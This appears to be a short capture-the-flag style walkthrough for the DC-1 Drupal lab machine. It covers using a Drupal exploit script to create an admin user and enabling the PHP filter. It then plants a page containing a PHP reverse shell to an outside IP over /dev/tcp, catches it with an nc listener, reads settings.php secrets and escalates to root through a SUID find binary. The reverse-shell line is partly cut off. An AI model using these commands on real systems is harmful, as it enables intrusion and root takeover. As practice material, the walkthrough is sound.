DC‑1 is a Drupal‑based machine. A known Drupal exploit is used to gain a shell, and privilege escalation is
achieved via a SUID find binary.
Target: DC‑1
Initial vector: Drupal RCE (PHP filter)
Privilege escalation: SUID find → shell
Use the provided exploit script (e.g. CHECK_exploit.2.7.py) to create an administrator user:
admin: UU pass : UU
Enable the PHP filter if needed:
http://192.168.162.193/admin/config/content/formats/php_code
Create a new Basic page with PHP content:
& /dev/tcp/192.168.45.169/443 0>&1'"); ?>
Listener:
$ nc -nlvp 443
Browse to the node (e.g. /node/3) to get a shell.
Find Drupal settings:
$ find . -name settings.php -> dbuser: R0ck3t -> $drupal_hash_salt = 'X8gdX7OdYRiBnlHoj0ukhtZ7eO4EDrvMkhN21SWZocs';
List SUID binaries:
$ find / -perm -4000 2>/dev/null -> /usr/bin/find
Spawn a root shell via GTFOBins:
$ /usr/bin/find . -exec /bin/sh \; # id; whoami